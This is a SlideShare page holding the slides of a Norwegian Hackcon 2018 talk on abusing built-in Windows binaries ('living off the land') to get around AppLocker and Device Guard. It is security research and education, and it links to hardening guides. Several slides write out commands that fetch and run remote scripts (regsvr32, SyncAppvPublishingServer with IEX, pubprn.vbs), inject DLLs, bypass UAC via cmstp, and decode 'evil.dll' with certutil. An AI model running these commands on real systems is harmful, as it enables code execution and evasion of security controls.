Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Windows binærfiler

260 Aufrufe

Veröffentlicht am

Foredrag fra Hackcon 2018 sesjon som heter Windows binærfiler - Et ekte eventyr i sårbarheter.

Veröffentlicht in: Technologie
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

Windows binærfiler

  1. 1. Windows binærfiler Et ekte eventyr i sårbarheter Oddvar Moe
  2. 2. WHOAMI /ALL • MVP 2 år • Jobbet med IT siden 2000 • MCP 16 år gammel • Dedikert med sikkerhet siste 5 år+ • Security Research - CVE-2017-8625 • Jobber @ Advania @oddvarmoe https://no.linkedin.com/i n/oddvarmoe https://www.facebook.com/oddvarmoe
  3. 3. «Dropping» 0-day • Lockscreen bypass
  4. 4. Angrepsteknikker ved bruk av Windows •«Living off the land» •Gjennomgang binærfiler •Egen research Håper du blir inspirert til egen research!
  5. 5. «Living off the land» Før 2013 – Mest brukt av Advanced persistence threat grupper Mer og mer vanlig i malware Bruke binær filer i Windows Unngå AV Eksekvere I minne Se normal ut Asdjksadkjek.exe vs mshta.exe
  6. 6. Old school Binær på disk – C:temphackertool.exe Eksekvere hackertool.exe fra disk Pakker ut filer / hente flere Moduler og hacker verktøy lastet i minne Living off the land Eksekvere Windows binær for å hente kode fra web Kjøre rett i minne
  7. 7. Hvordan bruke Windows binærer Angriper må første oppnå kode eksekvering Bruke «skjult» funksjonalitet Laste ned Laste opp Eksekvere Kompilere Laste inn DLL
  8. 8. EKSEMPLER PÅ WINDOWS BINÆR FILER
  9. 9. Dine følelser når jeg viser dette
  10. 10. Dine følelser når jeg viser dette
  11. 11. REGSVR32.exe •Register and unregister DLL files
  12. 12. REGSVR32.exe •regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll •Proxy aware
  13. 13. Gratulerer Oddvar – Du startet kalkulator! • Kalkulator er ikke faren her • Eksekvering av kode er • Det finnes prosjekter…. • Kunne startet reverse shell eller andre onde ting
  14. 14. RUNDLL32.exe •Eksekvere DLL filer
  15. 15. RUNDLL32.exe •rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert(‘HackCon%20Rules'); •Detaljer: https://stackoverflow.com/questions/25131484/rundll32- exe-javascript
  16. 16. CERTUTIL.exe •Brukes til sertifikater
  17. 17. CERTUTIL.exe • certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe • certutil.exe /decode base64kodetfil.txt evil.dll
  18. 18. MSBUILD.exe
  19. 19. MSBUILD.exe • Msbuild.exe MSBuildshell.cs -- PowerShell uten PowerShell!
  20. 20. Winword.exe • Word bruker vi til Office files. (Mind blowing fact)
  21. 21. Winword.exe •Winword.exe /ldllfile.dll
  22. 22. Mavinject32.exe •Microsoft Application Virtualization Injector •En del av App-V
  23. 23. SyncAppvPublishingServer.exe •Brukes for å hente siste APP-V applikasjoner fra server
  24. 24. SyncAppvPublishingServer.exe •SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/scr ipt.ps1') | IEX •Command injection vulnerability
  25. 25. Mavinject32.exe •Mavinject <PID> /INJECTRUNNING c:filesevil.dll •*Muligens fikset i siste Windows 10 build…
  26. 26. Andre som er verdt å nevne •Control.exe <path to dll> •odbcconf -f file.rsp •forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe •InstallUtil.exe •Regasm.exe / Regsvcs.exe
  27. 27. Ikke bare Windows binærer
  28. 28. Videre fremover – Next Gen • PUBPRN.vbs – C:WindowsSystem32Printing_Admin_Scriptsen-US pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/api0cradle/fb164762143b1ff4042d9c66 2171a568/raw/709aff66095b7f60e5d6f456a5e42021a95ca802/test.sct • CL_Invocation.ps1 - C:WindowsdiagnosticssystemAERO . CL_Invocation.ps1 SyncInvoke C:tempevil.exe • Slmgr.vbs / winrm.vbs – Requires registry changes
  29. 29. Men det var vel alle binær filer? • https://github.com/api0cradle/UltimateAppLockerByPassList • https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2 • https://gist.github.com/trustedsec/686057a1b8cdf3e580c57b211b263abe • https://github.com/redcanaryco/atomic-red-team/tree/master/Windows • https://attack.mitre.org/wiki/Execution
  30. 30. Min research (Ja, Security research av en Nordmann)
  31. 31. CLIFFHANGER
  32. 32. Bginfo.exe • Sysinternals tool • Sette info på skrivebordet
  33. 33. Bginfo.exe • Kan legge inn peker til script i bgi filen • live.sysinternals.comtoolsbginfo.exe 10.10.10.10webdbg.bgi /popup • bginfo.exe 10.10.10.10webdavbginfo.bgi /popup /nolicprompt • Kjører fra Webdav • Bginfo 4.21 og eldre = Device Guard / AppLocker bypass
  34. 34. Bginfo.exe
  35. 35. Det stopper ikke der • Fant ut senere • Kan sende .BGI filer på epost • Resulterte i en Defence In Depth patch til Office
  36. 36. Detaljer dersom du er interessert • BGI på mail: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ • Bypass Application whitelisting with BGInfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still- vulnerable/
  37. 37. CMSTP.exe •Connection Manager Profile installer •VPN oppsett Windows •Interessant binær fil
  38. 38. CMSTP.exe • Fant 1 UAC bypass - Cmstp.exe /au c:cmstpUACBypass.inf • Fant mulighet for å laste DLL fra ekstern webdav server (AppLocker fun) • cmstp.exe /ni /s c:cmstpCorpVPN.inf
  39. 39. Detaljer dersom du er interessert • CMSTP.exe Research - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ • UACME: https://github.com/hfiref0x/UACME • CMSTP SCT Loading - https://twitter.com/NickTyrer/status/958450014111633408
  40. 40. HH.EXE • Laste inn hjelpefiler i Windows • Førte til en Device Guard bypass (CVE-2017-8625)
  41. 41. HH.EXE
  42. 42. HH.EXE
  43. 43. HH.EXE
  44. 44. HH.EXE
  45. 45. HH.EXE INTEGRITY
  46. 46. HH.EXE • Custom CHM file • https://gist.githubusercontent.com/api0cradle/95ae3c7120f16255d94088bd89 59f4b2/raw/fa25b85e85bbb64c5cf021adf92b125357086a6f/GenerateCHM_1. 0.ps1
  47. 47. HH.EXE
  48. 48. Teamviewer AppLocker Bypass!
  49. 49. Beskyttelse mot slike angrep? • AppLocker med herding (Eller Device Guard): • https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ • https://oddvar.moe/2017/12/13/harden-windows-with-applocker-based-on-case-study-part- 1/ • https://oddvar.moe/2017/12/21/harden-windows-with-applocker-based-on-case-study-part- 2/ • https://github.com/api0cradle/UltimateAppLockerByPassList • Teste verktøy: • https://github.com/ALBY-Project/ALBY • https://github.com/GreatSCT/GreatSCT
  50. 50. ALBY – Lære C# prosjektet mitt •Ute i en tidlig preview •La meg vise det jeg har
  51. 51. TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TUSEN TAKK FOR MEG • Slides will come: https://Oddvar.moe • Shout-outs: Casey Smith - @subtee @Cneelis Nick Landers @monoxgas Jimmy - @bohops Adam - @Hexacorn Matt Nelson - @enigma0x3 Matt Graeber - @mattifestation Nick Tyrer - @NickTyrer James Forshaw - @tiraniddo +++++ Everyone else I forgot

×